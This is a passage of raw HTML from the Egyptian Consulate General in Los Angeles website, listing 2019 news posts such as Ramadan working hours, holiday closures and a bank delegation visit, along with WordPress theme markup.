كريم</a> </h2> <div class="wp-post-date"> <span>By egypt</span> &nbsp;/&nbsp; May 3, 2019 </div> <div class="wp-post-content"> <div class="wp-sub-content"></div> <a class="readmorebtn" href="http://egyconsulatela.com/%d8%b1%d9%85%d8%b6%d8%a7%d9%86-%d9%83%d8%b1%d9%8a%d9%85-2/">Read More</a> </div> </div> </div> <div class="post-image-bg"> <a href="http://egyconsulatela.com/%d8%b1%d9%85%d8%b6%d8%a7%d9%86-%d9%83%d8%b1%d9%8a%d9%85-2/"><img src="http://egyconsulatela.com/wp-content/uploads/2018/05/ramadan-images-2.jpg" alt="رمضان كريم" /></a> </div> </div> </div> <div class="post-slides"> <div class="post-content-position"> <!-- Content-left/right --> <div class="post-content-left wp-medium-6 wpcolumns"> <div class="recentpost-inner-content"> <div class="recentpost-categories"> <ul class="post-categories wppsac-post-categories"><li><a href="http://egyconsulatela.com/category/news-announcements/" rel="category"> News &amp; Announcements </a></li><li><a href="http://egyconsulatela.com/category/uncategorized/" rel="category"> Uncategorized </a></li></ul> </div> <h2 class="wp-post-title"> <a href="http://egyconsulatela.com/%d9%85%d9%88%d8%a7%d8%b9%d9%8a%d8%af-%d8%b9%d9%85%d9%84-%d8%a7%d9%84%d9%82%d9%86%d8%b5%d9%84%d9%8a%d8%a9-%d8%ae%d9%84%d8%a7%d9%84-%d8%b4%d9%87%d8%b1-%d8%b1%d9%85%d8%b6%d8%a7%d9%86-%d8%a7%d9%84%d9%83-2/">مواعيد عمل القنصلية خلال شهر رمضان الكريم</a> </h2> <div class="wp-post-date"> <span>By egypt</span> &nbsp;/&nbsp; May 3, 2019 </div> <div class="wp-post-content"> <div class="wp-sub-content"></div> <a class="readmorebtn" href="http://egyconsulatela.com/%d9%85%d9%88%d8%a7%d8%b9%d9%8a%d8%af-%d8%b9%d9%85%d9%84-%d8%a7%d9%84%d9%82%d9%86%d8%b5%d9%84%d9%8a%d8%a9-%d8%ae%d9%84%d8%a7%d9%84-%d8%b4%d9%87%d8%b1-%d8%b1%d9%85%d8%b6%d8%a7%d9%86-%d8%a7%d9%84%d9%83-2/">Read More</a> </div> </div> </div> <div class="post-image-bg"> <a href="http://egyconsulatela.com/%d9%85%d9%88%d8%a7%d8%b9%d9%8a%d8%af-%d8%b9%d9%85%d9%84-%d8%a7%d9%84%d9%82%d9%86%d8%b5%d9%84%d9%8a%d8%a9-%d8%ae%d9%84%d8%a7%d9%84-%d8%b4%d9%87%d8%b1-%d8%b1%d9%85%d8%b6%d8%a7%d9%86-%d8%a7%d9%84%d9%83-2/"><img src="" alt="مواعيد عمل القنصلية خلال شهر رمضان الكريم" /></a> </div> </div> </div> <div class="post-slides"> <div class="post-content-position"> <!-- Content-left/right --> <div class="post-content-left wp-medium-6 wpcolumns"> <div class="recentpost-inner-content"> <div class="recentpost-categories"> <ul class="post-categories wppsac-post-categories"><li><a href="http://egyconsulatela.com/category/news-announcements/" rel="category"> News &amp; Announcements </a></li></ul> </div> <h2 class="wp-post-title"> <a href="http://egyconsulatela.com/%d8%b1%d9%85%d8%b6%d8%a7%d9%86-%d9%83%d8%b1%d9%8a%d9%85/">رمضان كريم</a> </h2> <div class="wp-post-date"> <span>By egypt</span> &nbsp;/&nbsp; May 3, 2019 </div> <div class="wp-post-content"> <div class="wp-sub-content"></div> <a class="readmorebtn" href="http://egyconsulatela.com/%d8%b1%d9%85%d8%b6%d8%a7%d9%86-%d9%83%d8%b1%d9%8a%d9%85/">Read More</a> </div> </div> </div> <div class="post-image-bg"> <a href="http://egyconsulatela.com/%d8%b1%d9%85%d8%b6%d8%a7%d9%86-%d9%83%d8%b1%d9%8a%d9%85/"><img src="" alt="رمضان كريم" /></a> </div> </div> </div> <div class="post-slides"> <div class="post-content-position"> <!-- Content-left/right --> <div class="post-content-left wp-medium-6 wpcolumns"> <div class="recentpost-inner-content"> <div class="recentpost-categories"> <ul class="post-categories wppsac-post-categories"><li><a href="http://egyconsulatela.com/category/news-announcements/" rel="category"> News &amp; Announcements </a></li></ul> </div> <h2 class="wp-post-title"> <a href="http://egyconsulatela.com/ramadan-working-hours/">Ramadan Working Hours</a> </h2> <div class="wp-post-date"> <span>By egypt</span> &nbsp;/&nbsp; May 3, 2019 </div> <div class="wp-post-content"> <div class="wp-sub-content">In observance of the month of Ramadan the Consulate working hours will be as follows as of May 06, 2019</div> <a class="readmorebtn" href="http://egyconsulatela.com/ramadan-working-hours/">Read More</a> </div> </div> </div> <div class="post-image-bg"> <a href="http://egyconsulatela.com/ramadan-working-hours/"><img src="http://egyconsulatela.com/wp-content/uploads/2018/05/Ramadan-in-Duabi550x350.jpg" alt="Ramadan Working Hours" /></a> </div> </div> </div> <div class="post-slides"> <div class="post-content-position"> <!-- Content-left/right --> <div class="post-content-left wp-medium-6 wpcolumns"> <div class="recentpost-inner-content"> <div class="recentpost-categories"> <ul class="post-categories wppsac-post-categories"><li><a href="http://egyconsulatela.com/category/all/events/" rel="category"> Events </a></li><li><a href="http://egyconsulatela.com/category/news-announcements/" rel="category"> News &amp; Announcements </a></li></ul> </div> <h2 class="wp-post-title"> <a href="http://egyconsulatela.com/2226/">تهنئة السيد رئيس الجمهورية بمناسبة عيد القيامة المجيد</a> </h2> <div class="wp-post-date"> <span>By egypt</span> &nbsp;/&nbsp; April 26, 2019 </div> <div class="wp-post-content"> <div class="wp-sub-content">تهنئة السيد رئيس الجمهورية بمناسبة  عيد القيامة المجيد &nbsp;  "يُسعدني أن أرسل إليكم بخالص التهاني وصادق الأمنيات بمناسبة الاحتفال بعيد القيامة المجيد، وأغتنم</div> <a class="readmorebtn" href="http://egyconsulatela.com/2226/">Read More</a> </div> </div> </div> <div class="post-image-bg"> <a href="http://egyconsulatela.com/2226/"><img src="" alt="تهنئة السيد رئيس الجمهورية بمناسبة عيد القيامة المجيد" /></a> </div> </div> </div> <div class="post-slides"> <div class="post-content-position"> <!-- Content-left/right --> <div class="post-content-left wp-medium-6 wpcolumns"> <div class="recentpost-inner-content"> <div class="recentpost-categories"> <ul class="post-categories wppsac-post-categories"><li><a href="http://egyconsulatela.com/category/news-announcements/" rel="category"> News &amp; Announcements </a></li></ul> </div> <h2 class="wp-post-title"> <a href="http://egyconsulatela.com/%d8%a3%d8%ac%d8%a7%d8%b2%d8%a9-%d8%a8%d9%85%d9%86%d8%a7%d8%b3%d8%a8%d8%a9-%d8%b4%d9%85-%d8%a7%d9%84%d9%86%d8%b3%d9%8a%d9%85-%d9%88%d8%b9%d9%8a%d8%af-%d8%a7%d9%84%d8%b9%d9%85%d8%a7%d9%84-2019/">Consulate Closure &#8211; Monday, April 29 &#038; Wednesday, May 1</a> </h2> <div class="wp-post-date"> <span>By egypt</span> &nbsp;/&nbsp; April 26, 2019 </div> <div class="wp-post-content"> <div class="wp-sub-content">The Consulate General of the Arab Republic of Egypt in Los Angeles will be closed on Monday, April 29, 2019</div> <a class="readmorebtn" href="http://egyconsulatela.com/%d8%a3%d8%ac%d8%a7%d8%b2%d8%a9-%d8%a8%d9%85%d9%86%d8%a7%d8%b3%d8%a8%d8%a9-%d8%b4%d9%85-%d8%a7%d9%84%d9%86%d8%b3%d9%8a%d9%85-%d9%88%d8%b9%d9%8a%d8%af-%d8%a7%d9%84%d8%b9%d9%85%d8%a7%d9%84-2019/">Read More</a> </div> </div> </div> <div class="post-image-bg"> <a href="http://egyconsulatela.com/%d8%a3%d8%ac%d8%a7%d8%b2%d8%a9-%d8%a8%d9%85%d9%86%d8%a7%d8%b3%d8%a8%d8%a9-%d8%b4%d9%85-%d8%a7%d9%84%d9%86%d8%b3%d9%8a%d9%85-%d9%88%d8%b9%d9%8a%d8%af-%d8%a7%d9%84%d8%b9%d9%85%d8%a7%d9%84-2019/"><img src="http://egyconsulatela.com/wp-content/uploads/2019/04/635.jpg" alt="Consulate Closure &#8211; Monday, April 29 &#038; Wednesday, May 1" /></a> </div> </div> </div> <div class="post-slides"> <div class="post-content-position"> <!-- Content-left/right --> <div class="post-content-left wp-medium-6 wpcolumns"> <div class="recentpost-inner-content"> <div class="recentpost-categories"> <ul class="post-categories wppsac-post-categories"><li><a href="http://egyconsulatela.com/category/news-announcements/" rel="category"> News &amp; Announcements </a></li></ul> </div> <h2 class="wp-post-title"> <a href="http://egyconsulatela.com/%d8%a5%d8%b9%d9%84%d8%a7%d9%86-%d8%a8%d8%b4%d8%a3%d9%86-%d8%b2%d9%8a%d8%a7%d8%b1%d8%a9-%d9%88%d9%81%d8%af-%d8%a7%d9%84%d8%a8%d9%86%d9%83-%d8%a7%d9%84%d8%a3%d9%87%d9%84%d9%8a-%d8%a7%d9%84%d9%85%d8%b5/">إعلان بشأن زيارة وفد البنك الأهلي المصري</a> </h2> <div class="wp-post-date"> <span>By egypt</span> &nbsp;/&nbsp; April 2, 2019 </div> <div class="wp-post-content"> <div class="wp-sub-content">تنـويه  بشأن زيارة وفد من البنك الأهلي المصري للقنصلية &nbsp;      تهدي القنصلية العامة لجمهورية مصر العربية فى لوس أنجلوس أطيب تحياتها إلي</div> <a class="readmorebtn" href="http://egyconsulatela.com/%d8%a5%d8%b9%d9%84%d8%a7%d9%86-%d8%a8%d8%b4%d8%a3%d9%86-%d8%b2%d9%8a%d8%a7%d8%b1%d8%a9-%d9%88%d9%81%d8%af-%d8%a7%d9%84%d8%a8%d9%86%d9%83-%d8%a7%d9%84%d8%a3%d9%87%d9%84%d9%8a-%d8%a7%d9%84%d9%85%d8%b5/">Read More</a> </div> </div> </div> <div class="post-image-bg"> <a href="http://egyconsulatela.com/%d8%a5%d8%b9%d9%84%d8%a7%d9%86-%d8%a8%d8%b4%d8%a3%d9%86-%d8%b2%d9%8a%d8%a7%d8%b1%d8%a9-%d9%88%d9%81%d8%af-%d8%a7%d9%84%d8%a8%d9%86%d9%83-%d8%a7%d9%84%d8%a3%d9%87%d9%84%d9%8a-%d8%a7%d9%84%d9%85%d8%b5/"><img src="" alt="إعلان بشأن زيارة وفد البنك الأهلي المصري" /></a> </div> </div> </div> <div class="post-slides"> <div class="post-content-position"> <!-- Content-left/right --> <div class="post-content-left wp-medium-6 wpcolumns"> <div class="recentpost-inner-content"> <div class="recentpost-categories"> <ul class="post-categories wppsac-post-categories"><li><a href="http://egyconsulatela.com/category/news-announcements/" rel="category"> News &amp; Announcements </a></li></ul> </div> <h2 class="wp-post-title"> <a href="http://egyconsulatela.com/%d8%a5%d8%b9%d9%84%d8%a7%d9%86-%d8%a8%d9%85%d9%86%d8%a7%d8%b3%d8%a8%d8%a9-presidents-day/">Consulate Closure &#8211; President&#8217;s Day &#8211; Monday, February 18, 2019</a> </h2> <div class="wp-post-date"> <span>By egypt</span> &nbsp;/&nbsp; February 13, 2019 </div> <div class="wp-post-content"> <div class="wp-sub-content">The Consulate General of the Arab Republic of Egypt in Los Angeles will be closed on Monday, February 18, 2019</div> <a class="readmorebtn" href="http://egyconsulatela.com/%d8%a5%d8%b9%d9%84%d8%a7%d9%86-%d8%a8%d9%85%d9%86%d8%a7%d8%b3%d8%a8%d8%a9-presidents-day/">Read More</a> </div> </div> </div> <div class="post-image-bg"> <a href="http://egyconsulatela.com/%d8%a5%d8%b9%d9%84%d8%a7%d9%86-%d8%a8%d9%85%d9%86%d8%a7%d8%b3%d8%a8%d8%a9-presidents-day/"><img src="http://egyconsulatela.com/wp-content/uploads/2019/02/sfl-freebie-friday-presidents-day-weekend-freebies-20180216.jpg" alt="Consulate Closure &#8211; President&#8217;s Day &#8211; Monday, February 18, 2019" /></a> </div> </div> </div> <div class="post-slides"> <div class="post-content-position"> <!-- Content-left/right --> <div class="post-content-left wp-medium-6 wpcolumns"> <div class="recentpost-inner-content"> <div class="recentpost-categories"> <ul class="post-categories wppsac-post-categories"><li><a href="http://egyconsulatela.com/category/news-announcements/" rel="category"> News &amp; Announcements </a></li></ul> </div> <h2 class="wp-post-title"> <a href="http://egyconsulatela.com/%d8%a7%d8%ac%d8%a7%d8%b2%d8%a9-%d8%a8%d9%85%d9%86%d8%a7%d8%b3%d8%a8%d8%a9-25-%d9%8a%d9%86%d8%a7%d9%8a%d8%b1/">Consulate Closure &#8211; Friday, January 25, 2019</a> </h2> <div class="wp-post-date"> <span>By egypt</span> &nbsp;/&nbsp; January 22, 2019 </div> <div class="wp-post-content"> <div class="wp-sub-content">The Consulate General of the Arab Republic of Egypt in Los Angeles will be closed on Friday, January 25, 2019</div> <a class="readmorebtn" href="http://egyconsulatela.com/%d8%a7%d8%ac%d8%a7%d8%b2%d8%a9-%d8%a8%d9%85%d9%86%d8%a7%d8%b3%d8%a8%d8%a9-25-%d9%8a%d9%86%d8%a7%d9%8a%d8%b1/">Read More</a> </div> </div> </div> <div class="post-image-bg"> <a href="http://egyconsulatela.com/%d8%a7%d8%ac%d8%a7%d8%b2%d8%a9-%d8%a8%d9%85%d9%86%d8%a7%d8%b3%d8%a8%d8%a9-25-%d9%8a%d9%86%d8%a7%d9%8a%d8%b1/"><img src="http://egyconsulatela.com/wp-content/uploads/2018/04/Wallpaper-01.png" alt="Consulate Closure &#8211; Friday, January 25, 2019" /></a> </div> </div> </div> <div class="post-slides"> <div class="post-content-position"> <!-- Content-left/right --> <div class="post-content-left wp-medium-6 wpcolumns"> <div class="recentpost-inner-content"> <div class="recentpost-categories"> <ul class="post-categories wppsac-post-categories"><li><a href="http://egyconsulatela.com/category/news-announcements/" rel="category"> News &amp; Announcements </a></li></ul> </div> <h2 class="wp-post-title"> <a href="http://egyconsulatela.com/%d8%a5%d8%b9%d9%84%d8%a7%d9%86-%d8%a8%d9%85%d9%86%d8%a7%d8%b3%d8%a8%d8%a9-martin-luther-king-day/">Consulate Closure &#8211; Martin Luther King Day &#8211; January 16, 2019</a> </h2> <div class="wp-post-date"> <span>By egypt</span> &nbsp;/&nbsp; January 16, 2019 </div> <div class="wp-post-content"> <div class="wp-sub-content">The Consulate General of the Arab Republic of Egypt in Los Angeles will be closed on Monday January 16, 2019</div> <a class="readmorebtn" href="http://egyconsulatela.com/%d8%a5%d8%b9%d9%84%d8%a7%d9%86-%d8%a8%d9%85%d9%86%d8%a7%d8%b3%d8%a8%d8%a9-martin-luther-king-day/">Read More</a> </div> </div> </div> <div class="post-image-bg"> <a href="http://egyconsulatela.com/%d8%a5%d8%b9%d9%84%d8%a7%d9%86-%d8%a8%d9%85%d9%86%d8%a7%d8%b3%d8%a8%d8%a9-martin-luther-king-day/"><img src="http://egyconsulatela.com/wp-content/uploads/2019/01/MLK.jpg" alt="Consulate Closure &#8211; Martin Luther King Day &#8211; January 16, 2019" /></a> </div> </div> </div> </div> <div class="wppsac-slider-conf wppsac-hide" data-conf="{&quot;dots&quot;:&quot;true&quot;,&quot;arrows&quot;:&quot;true&quot;,&quot;autoplay&quot;:&quot;true&quot;,&quot;autoplay_interval&quot;:&quot;3000&quot;,&quot;speed&quot;:&quot;500&quot;,&quot;rtl&quot;:&quot;false&quot;}"></div> </div> </span></p> </div> </div> </div> </div> </div></div> </div> </section><section id="section-5cdd84906af8d" class=" fw-main-row-custom fw-section-no-padding auto fw-section-position-back tf-sh-8fb4a2a049f43899b7901df2c20cfcf0 " style=" " > <div class="fw-container" > <div class="fw-row"> <div id="column-5cdd84906b917" class="fw-col-sm-12 tf-sh-cacb747f5fa7f48f20f26b934867c06f" > <div class="fw-wrap-col-inner clearfix " > <div class="fw-col-inner"> <div class="fw-divider-space space-md clearfix" ></div> </div> </div> </div></div> <div class="fw-row"> <div id="column-5cdd84906c4f3" class="fw-col-sm-12 fw-col-md-6 tf-sh-8d69d4cdddfb375c3fefdac470ed6273 fw-animated-element" data-animation-type="fadeInLeft" data-animation-delay="300"> <div class="fw-wrap-col-inner clearfix " > <div class="fw-col-inner"> <div class="fw-shortcode-latest-posts postlist tf-sh-c01f35b88b9e5c235ff8148438117bef fw-letter-no-caps" data-blog-type="blog-1" data-posts-per-page="2" data-category="35" data-page="2" data-max-pages="23" data-blog-view="default" data-columns="fw-portfolio-cols-2" data-extra='YToxOntzOjEzOiJleHRyYV9vcHRpb25zIjthOjY6e3M6OToicG9zdF9kYXRlIjtzOjI6Im5vIjtzOjExOiJwb3N0X2F1dGhvciI7czoyOiJubyI7czoxNToicG9zdF9jYXRlZ29yaWVzIjtzOjM6InllcyI7czoyMzoiZGlzcGxheV9jb21tZW50c19udW1iZXIiO2E6Mjp7czo4OiJzZWxlY3RlZCI7czoyOiJubyI7czozOiJ5ZXMiO2E6MTp7czoyMDoiY29tbWVudHNfbnVtYmVyX3R5cGUiO3M6MjI6ImZ3LWNvbW1lbnQtbGluay10eXBlLTEiO319czoxMDoiYmxvZ190aXRsZSI7YTo3OntzOjg6InNlbGVjdGVkIjtzOjI6ImgzIjtzOjI6ImgxIjthOjE6e3M6MTY6ImFkdmFuY2VkX3N0eWxpbmciO2E6Mjp7czoyOiJoMSI7YToxMTp7czoxMToiZ29vZ2xlX2ZvbnQiO2I6MTtzOjY6InN1YnNldCI7czo5OiJsYXRpbi1leHQiO3M6OToidmFyaWF0aW9uIjtzOjM6IjEwMCI7czo2OiJmYW1pbHkiO3M6NDoiTGF0byI7czo1OiJzdHlsZSI7YjowO3M6Njoid2VpZ2h0IjtiOjA7czo0OiJzaXplIjtzOjI6IjUyIjtzOjExOiJsaW5lLWhlaWdodCI7czoyOiI2NSI7czoxNDoibGV0dGVyLXNwYWNpbmciO3M6MjoiLTEiO3M6MTM6ImNvbG9yLXBhbGV0dGUiO2E6Mjp7czoyOiJpZCI7czo5OiJmdy1jdXN0b20iO3M6NToiY29sb3IiO3M6MDoiIjt9czo4OiJpc19zYXZlZCI7YjowO31zOjExOiJob3Zlcl9jb2xvciI7YToyOntzOjU6ImNvbG9yIjtzOjA6IiI7czoyOiJpZCI7czo5OiJmdy1jdXN0b20iO319fXM6MjoiaDIiO2E6MTp7czoxNjoiYWR2YW5jZWRfc3R5bGluZyI7YToyOntzOjI6ImgyIjthOjExOntzOjExOiJnb29nbGVfZm9udCI7YjoxO3M6Njoic3Vic2V0IjtzOjk6ImxhdGluLWV4dCI7czo5OiJ2YXJpYXRpb24iO3M6MzoiNzAwIjtzOjY6ImZhbWlseSI7czo0OiJMYXRvIjtzOjU6InN0eWxlIjtiOjA7czo2OiJ3ZWlnaHQiO2I6MDtzOjQ6InNpemUiO3M6MjoiMzYiO3M6MTE6ImxpbmUtaGVpZ2h0IjtzOjI6IjU2IjtzOjE0OiJsZXR0ZXItc3BhY2luZyI7czoyOiItMSI7czoxMzoiY29sb3ItcGFsZXR0ZSI7YToyOntzOjI6ImlkIjtzOjk6ImZ3LWN1c3RvbSI7czo1OiJjb2xvciI7czowOiIiO31zOjg6ImlzX3NhdmVkIjtiOjA7fXM6MTE6ImhvdmVyX2NvbG9yIjthOjI6e3M6NToiY29sb3IiO3M6MDoiIjtzOjI6ImlkIjtzOjk6ImZ3LWN1c3RvbSI7fX19czoyOiJoMyI7YToxOntzOjE2OiJhZHZhbmNlZF9zdHlsaW5nIjthOjI6e3M6MjoiaDMiO2E6MTE6e3M6MTE6Imdvb2dsZV9mb250IjtiOjE7czo2OiJzdWJzZXQiO3M6OToibGF0aW4tZXh0IjtzOjk6InZhcmlhdGlvbiI7czozOiIzMDAiO3M6NjoiZmFtaWx5IjtzOjQ6IkxhdG8iO3M6NToic3R5bGUiO2I6MDtzOjY6IndlaWdodCI7YjowO3M6NDoic2l6ZSI7czoyOiIzMCI7czoxMToibGluZS1oZWlnaHQiO3M6MjoiMzgiO3M6MTQ6ImxldHRlci1zcGFjaW5nIjtzOjE6IjAiO3M6MTM6ImNvbG9yLXBhbGV0dGUiO2E6Mjp7czoyOiJpZCI7czo5OiJmdy1jdXN0b20iO3M6NToiY29sb3IiO3M6MDoiIjt9czo4OiJpc19zYXZlZCI7YjowO31zOjExOiJob3Zlcl9jb2xvciI7YToyOntzOjU6ImNvbG9yIjtzOjA6IiI7czoyOiJpZCI7czo5OiJmdy1jdXN0b20iO319fXM6MjoiaDQiO2E6MTp7czoxNjoiYWR2YW5jZWRfc3R5bGluZyI7YToyOntzOjI6Img0IjthOjExOntzOjExOiJnb29nbGVfZm9udCI7YjoxO3M6Njoic3Vic2V0IjtzOjk6ImxhdGluLWV4dCI7czo5OiJ2YXJpYXRpb24iO3M6MzoiMzAwIjtzOjY6ImZhbWlseSI7czo0OiJMYXRvIjtzOjU6InN0eWxlIjtiOjA7czo2OiJ3ZWlnaHQiO2I6MDtzOjQ6InNpemUiO3M6MjoiMjYiO3M6MTE6ImxpbmUtaGVpZ2h0IjtzOjI6IjMyIjtzOjE0OiJsZXR0ZXItc3BhY2luZyI7czoxOiIwIjtzOjEzOiJjb2xvci1wYWxldHRlIjthOjI6e3M6MjoiaWQiO3M6OToiZnctY3VzdG9tIjtzOjU6ImNvbG9yIjtzOjA6IiI7fXM6ODoiaXNfc2F2ZWQiO2I6MDt9czoxMToiaG92ZXJfY29sb3IiO2E6Mjp7czo1OiJjb2xvciI7czowOiIiO3M6MjoiaWQiO3M6OToiZnctY3VzdG9tIjt9fX1zOjI6Img1IjthOjE6e3M6MTY6ImFkdmFuY2VkX3N0eWxpbmciO2E6Mjp7czoyOiJoNSI7YToxMTp7czoxMToiZ29vZ2xlX2ZvbnQiO2I6MTtzOjY6InN1YnNldCI7czo5OiJsYXRpbi1leHQiO3M6OToidmFyaWF0aW9uIjtzOjM6IjMwMCI7czo2OiJmYW1pbHkiO3M6NDoiTGF0byI7czo1OiJzdHlsZSI7YjowO3M6Njoid2VpZ2h0IjtiOjA7czo0OiJzaXplIjtzOjI6IjE5IjtzOjExOiJsaW5lLWhlaWdodCI7czoyOiIyOCI7czoxNDoibGV0dGVyLXNwYWNpbmciO3M6MToiMCI7czoxMzoiY29sb3ItcGFsZXR0ZSI7YToyOntzOjI6ImlkIjtzOjk6ImZ3LWN1c3RvbSI7czo1OiJjb2xvciI7czowOiIiO31zOjg6ImlzX3NhdmVkIjtiOjA7fXM6MTE6ImhvdmVyX2NvbG9yIjthOjI6e3M6NToiY29sb3IiO3M6MDoiIjtzOjI6ImlkIjtzOjk6ImZ3LWN1c3RvbSI7fX19czoyOiJoNiI7YToxOntzOjE2OiJhZHZhbmNlZF9zdHlsaW5nIjthOjI6e3M6MjoiaDYiO2E6MTE6e3M6MTE6Imdvb2dsZV9mb250IjtiOjE7czo2OiJzdWJzZXQiO3M6OToibGF0aW4tZXh0IjtzOjk6InZhcmlhdGlvbiI7czozOiIzMDAiO3M6NjoiZmFtaWx5IjtzOjQ6IkxhdG8iO3M6NToic3R5bGUiO2I6MDtzOjY6IndlaWdodCI7YjowO3M6NDoic2l6ZSI7czoyOiIxNCI7czoxMToibGluZS1oZWlnaHQiO3M6MjoiMjYiO3M6MTQ6ImxldHRlci1zcGFjaW5nIjtzOjE6IjAiO3M6MTM6ImNvbG9yLXBhbGV0dGUiO2E6Mjp7czoyOiJpZCI7czo5OiJmdy1jdXN0b20iO3M6NToiY29sb3IiO3M6MDoiIjt9czo4OiJpc19zYXZlZCI7YjowO31zOjExOiJob3Zlcl9jb2xvciI7YToyOntzOjU6ImNvbG9yIjtzOjA6IiI7czoyOiJpZCI7czo5OiJmdy1jdXN0b20iO319fX1zOjE0OiJidXR0b25fb3B0aW9ucyI7YTo5OntzOjU6InN0eWxlIjthOjQ6e3M6ODoic2VsZWN0ZWQiO3M6ODoiZnctYnRuLTEiO3M6ODoiZnctYnRuLTEiO2E6MTp7czoxMzoiYm9yZGVyX3JhZGl1cyI7czoxOiIwIjt9czo4OiJmdy1idG4tMiI7YToyOntzOjEzOiJib3JkZXJfcmFkaXVzIjtzOjE6IjAiO3M6MTE6ImJvcmRlcl9zaXplIjtzOjE6IjEiO31zOjg6ImZ3LWJ0bi0zIjthOjE6e3M6MTE6ImJvcmRlcl9zaXplIjtzOjE6IjEiO319czoxMjoibm9ybWFsX2NvbG9yIjthOjI6e3M6NToiY29sb3IiO3M6MDoiIjtzOjI6ImlkIjtzOjk6ImZ3LWN1c3RvbSI7fXM6MTE6ImhvdmVyX2NvbG9yIjthOjI6e3M6NToiY29sb3IiO3M6MDoiIjtzOjI6ImlkIjtzOjk6ImZ3LWN1c3RvbSI7fXM6MjI6ImxhYmVsX2FkdmFuY2VkX3N0eWxpbmciO2E6Mjp7czo0OiJ0ZXh0IjthOjExOntzOjExOiJnb29nbGVfZm9udCI7YjoxO3M6Njoic3Vic2V0IjtzOjk6ImxhdGluLWV4dCI7czo5OiJ2YXJpYXRpb24iO3M6OToiNzAwaXRhbGljIjtzOjY6ImZhbWlseSI7czo0OiJMYXRvIjtzOjU6InN0eWxlIjtiOjA7czo2OiJ3ZWlnaHQiO2I6MDtzOjQ6InNpemUiO3M6MjoiMTUiO3M6MTE6ImxpbmUtaGVpZ2h0IjtzOjI6IjMwIjtzOjE0OiJsZXR0ZXItc3BhY2luZyI7czo0OiItMC41IjtzOjEzOiJjb2xvci1wYWxldHRlIjthOjI6e3M6MjoiaWQiO3M6OToiZnctY3VzdG9tIjtzOjU6ImNvbG9yIjtzOjA6IiI7fXM6ODoiaXNfc2F2ZWQiO2I6MTt9czoxNjoiaG92ZXJfdGV4dF9jb2xvciI7YToyOntzOjU6ImNvbG9yIjtzOjA6IiI7czoyOiJpZCI7czo5OiJmdy1jdXN0b20iO319czo1OiJsYWJlbCI7czozNzoiJm5ic3A7ICZuYnNwOyBSZWFkIE1vcmUgJm5ic3A7ICZuYnNwOyI7czo0OiJzaXplIjthOjI6e3M6ODoic2VsZWN0ZWQiO3M6OToiZnctYnRuLW1kIjtzOjY6ImN1c3RvbSI7YToyOntzOjU6IndpZHRoIjtzOjA6IiI7czo2OiJoZWlnaHQiO3M6MDoiIjt9fXM6OToiaWNvbl90eXBlIjthOjM6e3M6ODoidGFiX2ljb24iO3M6MTA6Imljb24tY2xhc3MiO3M6MTA6Imljb24tY2xhc3MiO2E6MTp7czoxMDoiaWNvbl9jbGFzcyI7czowOiIiO31zOjExOiJ1cGxvYWQtaWNvbiI7YToxOntzOjE3OiJ1cGxvYWQtY3VzdG9tLWltZyI7czowOiIiO319czoxMzoiaWNvbl9wb3NpdGlvbiI7czoxNDoicHVsbC1sZWZ0LWljb24iO3M6OToiaWNvbl9zaXplIjtzOjI6IjEyIjt9fX0='> <article id="post-2239" class="post clearfix post-list-type-1 post-2239 type-post status-publish format-standard has-post-thumbnail hentry category-about-egypt category-all category-consulate-activities category-events category-news-announcements category-uncategorized" itemscope="itemscope" itemtype="https://schema.org/BlogPosting" itemprop="blogPost"> <div class="fw-post-image fw-block-image-parent fw-overlay-1"> <a href="http://egyconsulatela.com/%d8%b1%d9%85%d8%b6%d8%a7%d9%86-%d9%83%d8%b1%d9%8a%d9%85-2/" class="post-thumbnail fw-block-image-child fw-ratio-16-9 fw-ratio-container"> <noscript itemscope itemtype="https://schema.org/ImageObject" itemprop="image"><img src="http://egyconsulatela.com/wp-content/uploads/2018/05/ramadan-images-2.jpg" alt="ramadan-images-2" data-maxdpr="1.7" class="attachment-post-thumbnail lazyload" /><meta itemprop="url" content="http://egyconsulatela.com/wp-content/uploads/2018/05/ramadan-images-2.jpg"><meta itemprop="width" content="564"><meta itemprop="height" content="564"></noscript><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-sizes="auto" data-srcset="http://egyconsulatela.com/wp-content/uploads/2018/05/ramadan-images-2-295x166.jpg 295w" alt="ramadan-images-2" data-maxdpr="1.7" class="attachment-post-thumbnail lazyload" /> <div class="fw-block-image-overlay"> <div class="fw-itable"> <div class="fw-icell"> <i class="fw-icon-link"></i> </div> </div> </div> </a> </div> <header class="entry-header"> <div class="wrap-entry-meta"> <meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://google.com/article"/> <span class="cat-links"> In <a href="http://egyconsulatela.com/category/about-egypt/" rel="tag">About Egypt</a>, <a href="http://egyconsulatela.com/category/all/" rel="tag">All Posts</a>, <a href="http://egyconsulatela.com/category/consulate-activities/" rel="tag">Consulate Activities</a>, <a href="http://egyconsulatela.com/category/all/events/" rel="tag">Events</a>, <a href="http://egyconsulatela.com/category/news-announcements/" rel="tag">News &amp; Announcements</a>, <a href="http://egyconsulatela.com/category/uncategorized/" rel="tag">Uncategorized</a></span> </div> <h3 class="entry-title" itemprop="headline"> <a href="http://egyconsulatela.com/%d8%b1%d9%85%d8%b6%d8%a7%d9%86-%d9%83%d8%b1%d9%8a%d9%85-2/">رمضان كريم</a> </h3> </header> <div class="entry-content clearfix" itemprop="text"> <footer class="entry-meta clearfix"> <a href="http://egyconsulatela.com/%d8%b1%d9%85%d8%b6%d8%a7%d9%86-%d9%83%d8%b1%d9%8a%d9%85-2/" class="fw-btn-post-read-more-blog fw-btn fw-btn-md fw-btn-1" style=""> <span>     Read More     </span> </a> </footer> </div> </article><article id="post-2236" class="post clearfix post-list-type-1 post-2236 type-post status-publish format-standard hentry category-news-announcements category-uncategorized" itemscope="itemscope" itemtype="https://schema.org/BlogPosting" itemprop="blogPost"> <header class="entry-header"> <div class="wrap-entry-meta"> <meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://google.com/article"/> <span class="cat-links"> In <a href="http://egyconsulatela.com/category/news-announcements/" rel="tag">News &amp; Announcements</a>, <a href="http://egyconsulatela.com/category/uncategorized/" rel="tag">Uncategorized</a></span> </div> <h3 class="entry-title" itemprop="headline"> <a 